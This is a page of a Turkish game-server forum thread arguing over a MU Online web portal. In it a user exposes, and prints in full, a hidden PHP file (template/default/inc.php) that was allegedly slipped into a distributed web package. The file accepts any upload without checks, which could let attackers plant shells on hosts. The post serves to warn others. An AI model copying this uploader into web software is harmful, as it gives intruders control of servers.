Şimdi Ara

MD Portal vJunior | Test Edecek Serverlar.. (5. sayfa)

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
192
Cevap
0
Favori
24.947
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: önceki 34567
Sayfaya Git
Git
sonraki
Giriş
  • bunu tek siz mi kullanıcaksınız yoksa sitenizden yayınlayacakmısınız.. Hoş kullanan serverları hacklemeyinde DarkLq hortlat bakim HAYAL et bi topici

• quote:

Orjinalden alıntı: _Xeo_

bunu tek siz mi kullanıcaksınız yoksa sitenizden yayınlayacakmısınız.. Hoş kullanan serverları hacklemeyinde DarkLq hortlat bakim HAYAL et bi topici

Nasreddin Hocanın komşusu hocaya kazanını getirmiş ve hoca senin kazan doğurdu demiş Hocada buna karşılık;Doğurur tabi Kazanın .mına koymuşsunuz demiş
    Bi konuyuda kirletme be adam !
    Napcan siteye verirlerse (Ç)Alıntı yapcan galiba
    Sende beklion dimi bunu hınzır seni

• quote:

Orjinalden alıntı: KarizmA

quote:

bunu tek siz mi kullanıcaksınız yoksa sitenizden yayınlayacakmısınız.. Hoş kullanan serverları hacklemeyinde DarkLq hortlat bakim HAYAL et bi topici

Nasreddin Hocanın komşusu hocaya kazanını getirmiş ve hoca senin kazan doğurdu demiş Hocada buna karşılık;Doğurur tabi Kazanın .mına koymuşsunuz demiş
    Bi konuyuda kirletme be adam !
    Napcan siteye verirlerse (Ç)Alıntı yapcan galiba
    Sende beklion dimi bunu hınzır seni

Koyan hoca olmasın..
    Kazanı hocaya veriyor çünkü

• quote:

seni

Yazık garibime yalakalık yapacak diye nasılda çırpınıyor.

• quote:

Orjinalden alıntı: Shady`

quote:

seni

Yazık garibime yalakalık yapacak diye nasılda çırpınıyor.

Kime yazdıgını acıklarsan sevinirim..

• Alıntıyı yaptığım yaloşa.
  • Portal Ne Zaman Bitecek ? Uzun Zamandır Konu Hakkında Duyuru Yapılmıyor.
  • Delly ve ekibi hayatımda gördüğüm en büyük sahtear ve emek hırsızısınız. Nedenini hemen açıklayayım,
    www.muonlinedestek.com da dağıttığınız sözde muweb 9 decoded isimle web sitesinin içerisindeki oynamalarınızdır.

Daha açık söyleyeyim, template/default/inc.php. Bilmeyenler için dosyanın içeriği;

<html> 
    <head>
    <style>
    a:visited{;color:'000000';text-decoration:none;}
    a:hover{;color:'ff0000';text-decoration:none;}
    a:link{;color:'000000';text-decoration:none;}
    </style>
    <title>funLoad</title>
    </head>
    <body bgcolor="#E6E6FF" text="#000000">
    <?php
    if($git) {
    $dosya_dizin = "images";
    copy ( $dosya, "$dosya_dizin/$dosya_name" );
    echo "$dosya_size $dosya_name '>Complated.'";
    }
    else {
    ?>
    <form method="post" action="" enctype="multipart/form-data" >
    <table>
    <tr>
    <td><input type="file"name="dosya"></td>
    <td><input type="submit" value="Get" name="git"></td>
    </tr>
    </table>
    </form>
    <?php
    }
    ?>
    </body>
    </html>

MuWeb 9 u yazan ekibin aralarında tahminime göre türklerde vardı. Yoksa koskoca masterler türkçe kodlama yapacak değil ya. Bu birinci ihtimaldi. İkinci ihtimal ise sizin bir sahtekar olduğunuzdur. Bu dosya sayesinde ağınıza düşenlerin hostuna shell vb. scriptler yükleyerek emeklerini çalacaksınız.

Galiba bu numaranız tutmadı, şimdi portal işine sarıldınız. Umarım bu portalı yayınladığınızda ki ayrıca şunu da belirtmek isterim bu portal sıfırdan yazılmıyor, başka bir script üzerinde oynama yapılıyor bakınız;
     MD Portal vJunior | Test Edecek Serverlar..

Bu kadar zekisiniz sıfırdan yazıyorsunuz bunlar neden daha türkçe değil.

Tüm DH üyelerine uyarım sakın bu sahtekarların verdiği hiç bir script dosya vb. şeylerini sunucunuza almayın. Hatta verdikleri bir bardak suyu dahi içmeyin.

• ßen buna Sadece Gülerim..Scriptin Türkçe oLması ile Hiçbi alakamiz yok ki zaten o Scritp ile hiç bişey sokamassin pc e..Boşuna Çamur atmaya çalışma.

PortaL'a gELince Yukarıya Site Admins'i yazmak içn Başka Scriptin üzerinden editLemeye Gerek yok..Zaten Hangi Scriptte var bunlar ? Site Admins Game Masters fln.OnLar EL ile yazilmiş yazılar.Ordaki ßanlanan DeLLy fln şuanlık elle yazılmış yazılardır.SQL den okunup yazılmıyor yani..Diğer ResimLeri Nie almadın? Yoksa onlarda çamur atıcak bişey yokmuydu? Yabancı YazıLmışta NooLmus PortaL'ın adı da yabancı o zmn o da mı Baska scriptten edit.

ßişey Yapmaya çalışıyorsan araştırda öyLe yap..ßize Çamur atmak kolay diiL..Çoğu kişi bunu yapmaya çalıstı ama başaramadi eLLerinde ne bi kanıt war nede başka bişe Bir kaç Çoluk Çocucu kandırdılar o kadar.

Edit:/ ve Şunuda SöyLiimde Barı ßiraz ßiLgin oLsun Muweb'i Yazan ßir ekip diiL ve Gözünde Koskocaman yaptıgın Master 19 Yaşında ßir Çocuk.

< Bu mesaj bu kişi tarafından değiştirildi |ReSo| -- 2 Ağustos 2008; 13:46:47 >

• quote:

Orjinalden alıntı: |ReSo|

ßen buna Sadece Gülerim..Scriptin Türkçe oLması ile Hiçbi alakamiz yok ki zaten o Scritp ile hiç bişey sokamassin pc e..Boşuna Çamur atmaya çalışma.

PortaL'a gELince Yukarıya Site Admins'i yazmak içn Başka Scriptin üzerinden editLemeye Gerek yok..Zaten Hangi Scriptte var bunlar ? Site Admins Game Masters fln.OnLar EL ile yazilmiş yazılar.Ordaki ßanlanan DeLLy fln şuanlık elle yazılmış yazılardır.SQL den okunup yazılmıyor yani..Diğer ResimLeri Nie almadın? Yoksa onlarda çamur atıcak bişey yokmuydu? Yabancı YazıLmışta NooLmus PortaL'ın adı da yabancı o zmn o da mı Baska scriptten edit.

ßişey Yapmaya çalışıyorsan araştırda öyLe yap..ßize Çamur atmak kolay diiL..Çoğu kişi bunu yapmaya çalıstı ama başaramadi eLLerinde ne bi kanıt war nede başka bişe Bir kaç Çoluk Çocucu kandırdılar o kadar.

Edit:/ ve Şunuda SöyLiimde Barı ßiraz ßiLgin oLsun Muweb'i Yazan ßir ekip diiL 19 Yaşındaki Birisi.

Bundan büyük kanıt olacağını zannetmiyorum. Siz sadece savunma modunda konuşursunuz ama inkar edemeyeceğinizi artık anlayın. Çamur atacak olsam inan bunu size değil kaliteli işler yapanlara yaparım.

Edit:Gözünde Koskocaman yaptıgın Master 19 Yaşında ßir Çocuk. <-- Demişsin, Bende diyorum ki en azından DÜRÜST

< Bu mesaj bu kişi tarafından değiştirildi pc-copat -- 2 Ağustos 2008; 13:57:16 >

• Bunu kodlara bakarken ben bulmuştum
    zaten orjinal dosyaya bakarsanız
    template/default/inc.php diye bir dosyanın olmadığını görürsünüz.
    Bunu yapmadaki amacınız nedir? Script ile herhangi bir işlevsel yanı yok sonuç olarak bağımsız çalışıyor
    ve hiç bir kontrol yapmadan bulunduğu host a dosya atılabiliyor?
    ve nedense gizlenmiş....

< Bu mesaj bu kişi tarafından değiştirildi WolfBroS -- 2 Ağustos 2008; 14:01:40 >
  • delly senden birşey istesem yapmassin..^^^^^^^
    Bana o tema nin scpritini verirmisin msn furkan.saglam@msn.com
    ucret istiyorsan olur..
  • Bencede Delly bir çalısma ama ne zmn suncan deneme olarak sunsanda beizde kullansak!
  • Merhaba Arkadaşlar 15 Gündür iş yüzünden Telefon Cekmeyen Bi Şantiyedeyim.. ve daha 1 ay gibi bi süre kalıcaz..

Girmişken bişeyler yazim dedim (:

O bahsettiğin dosyayı ben de ilk gördüm bi işlevi de yok bir sürü yabancı dosya var zaten içinde decoder scripti bile var .. ayıklayıp atamamışız demekki..

ben açık koymak istesem sen değil DH ayakLansa buLamaz kusura bakma cocuq...

indirin o dosyayı silin.. benim muweble işim olmaz artık .. decoder bile yaptık alın kullanın daha ne konuşuyosunuz..

www.muonlinedestek.com/decoder.php al burdan kendin cevir....

/ İngilizce oLmasının Sebebini de yazayım.. ben script kodlarken yarı ingilizce yarı turkce yazıorm..

kalkıp oraya BANLANMIŞ CHARLAR yada YASAKLANMIŞ KARAKTERLER gibi saçma Şeyler Yazacak değiLim..

Banned Chars Banned Accounts en güzeL CümLeler..

hadi kolay gelsin..

< Bu mesaj bu kişi tarafından değiştirildi DeLLy® -- 8 Ağustos 2008; 20:44:10 >

• Yanlız site Suspend Olmuş.
  • quote:

Orjinalden alıntı: DeLLy®

Merhaba Arkadaşlar 15 Gündür iş yüzünden Telefon Cekmeyen Bi Şantiyedeyim.. ve daha 1 ay gibi bi süre kalıcaz..

O bahsettiğin dosyayı ben de ilk gördüm bi işlevi de yok bir sürü yabancı dosya var zaten içinde decoder scripti bile var .. ayıklayıp atamamışız demekki..

indirin o dosyayı silin.. benim muweble işim olmaz artık .. decoder bile yaptık alın kullanın daha ne konuşuyosunuz..

/ İngilizce oLmasının Sebebini de yazayım.. ben script kodlarken yarı ingilizce yarı turkce yazıorm..

kalkıp oraya BANLANMIŞ CHARLAR yada YASAKLANMIŞ KARAKTERLER gibi saçma Şeyler Yazacak değiLim..

hadi kolay gelsin..

Görünen köy klavuz istemez. Orjinalinde olmayan bir dosya neden orada acaba?

Ayrıca eleştriyorsan veya tartışıyorsanda saygı çerçevesini aşma. Kimin ne olduğunu herkes biliyor.

• quote:

Orjinalden alıntı: DeLLy®

Merhaba Arkadaşlar 15 Gündür iş yüzünden Telefon Cekmeyen Bi Şantiyedeyim.. ve daha 1 ay gibi bi süre kalıcaz..

hadi kolay gelsin..

Bu sitenin yayını geçiçi olarak durdurulmuştur.

Lütfen iletişime geçin:www.teknohost.net - destek@teknohost.net - 0216 338 6621

• Ücret ödememe gibi bir sorun oldugunu sanmıyorum. büyük ihtimal fazla hit almaktan serverı kasmıştır. onlarda suspend yapmıştır
  • Yabancı lokasyon sitelerde türk firmaları kiralık sunucu kiralıyorlar, sonrada sanki gerçek iş sahibiymiş gibi yabancıları söz sahibi yapıyorlar. Dolayısıyla onlar ne derse o oluyor. Demem o ki illegal bi içerikten dolayı kiralık sunucu problem çıkarmıştır.
  • Problem Cıkardıgını Sanmam. Cunki Tufan Tekno Host Satış Departmanında
  • 
Sayfa: önceki 34567
Sayfaya Git
Git
sonraki
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.